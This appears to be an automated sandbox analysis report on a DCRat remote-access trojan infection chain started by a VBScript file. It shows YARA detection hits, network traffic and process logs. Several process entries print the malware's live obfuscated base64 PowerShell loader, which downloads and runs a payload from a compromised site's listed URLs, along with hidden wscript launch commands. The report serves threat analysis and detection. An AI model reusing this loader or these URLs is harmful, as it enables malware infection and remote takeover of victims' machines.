                Source: powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000009.00000002.2137458295.000001355E264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C4C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C09E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C2FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000004.00000002.2351244189.00000155D3D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C5662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2089840253.0000027FDD117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2257316904.0000027FEBA14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2257316904.0000027FEB8DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2475466595.000001BCA3A64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95166000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2475466595.000001BCA392E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355E2BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3182605416.000001356CB84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000006.00000002.2089840253.0000027FDCCBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355DEC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000006.00000002.2089840253.0000027FDCCBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355DEC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C4FDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C3EB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0E90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C09E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CAA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C52CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/
                Source: powershell.exe, 00000013.00000002.2417662894.00000240C089E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/09/dX
                Source: powershell.exe, 00000021.00000002.2742802158.000001C03A26A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C4058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C52CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CAA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txt
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.5:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.5:49719 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7896, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3872, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                Source: powershell.exeProcess created: 42

                System Summary

                barindex
                Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 4.2.powershell.exe.155dc4f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                Source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                Source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                Source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                Source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                Source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                Source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                Source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                Source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                Source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                Source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                Source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                Source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                Source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                Source: 19.2.powershell.exe.240c0f59258.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 4.2.powershell.exe.155c408daf0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 33.2.powershell.exe.1c03c941ab0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 4.2.powershell.exe.155c5369780.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 0000001A.00000002.2343267450.0000000001509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 00000004.00000002.2534304751.00000155DC4F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 00000027.00000002.2729558667.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 00000027.00000002.2794514159.0000000002C6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 0000001A.00000002.2386589663.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 00000027.00000002.2794514159.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: Process Memory Space: powershell.exe PID: 1120, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7896, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: Process Memory Space: powershell.exe PID: 7896, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegSvcs.exe PID: 3872, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegSvcs.exe PID: 7484, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
